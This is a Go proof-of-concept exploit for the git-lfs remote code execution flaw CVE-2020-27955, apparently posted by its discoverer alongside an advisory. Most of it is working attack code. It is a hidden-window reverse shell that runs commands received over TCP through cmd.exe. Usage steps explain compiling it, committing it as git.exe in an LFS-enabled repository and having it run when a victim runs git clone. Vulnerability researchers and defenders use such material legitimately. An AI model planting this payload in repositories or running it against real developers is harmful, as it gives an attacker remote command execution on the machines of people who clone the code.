/* Go PoC exploit for git-lfs - Remote Code Execution (RCE) vulnerability CVE-2020-27955 git-lfs-RCE-exploit-CVE-2020-27955.go Discovered by Dawid Golunski https://legalhackers.com https://exploitbox.io Affected (RCE exploit): Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / SmartGit / SourceTree etc. Basically the whole Windows dev world which uses git. Usage: Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go Save & commit as git.exe The payload should get executed automatically on git clone operation. It spawns a reverse shell, or a calc.exe for testing (if it couldn't connect). An lfs-enabled repository with lfs files may also be needed so that git-lfs gets invoked. This can be achieved with: git lfs track "*.dat" echo "fat bug file" > lfsdata.dat git add .* git add * git commmit -m 'git-lfs exploit' -a Check out the full advisory for details: https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html PoC video at: https://youtu.be/tlptOf9w274 ** For testing purposes only ** */ package main import ( "net" "os/exec" "bufio" "syscall" ) func revsh(host string) { c, err := net.Dial("tcp", host) if nil != err { // Conn failed if nil != c { c.Close() } // Calc for testing purposes if no listener available cmd := exec.Command("calc") cmd.Run() return } r := bufio.NewReader(c) for { runcmd, err := r.ReadString('\n') if nil != err { c.Close() return } cmd := exec.Command("cmd", "/C", runcmd) cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} out, _ := cmd.CombinedOutput() c.Write(out) } } // Connect to netcat listener on local port 1337 func main() { revsh("localhost:1337") } -- Regards, Dawid Golunski https://legalhackers.com https://ExploitBox.io t: @dawid_golunski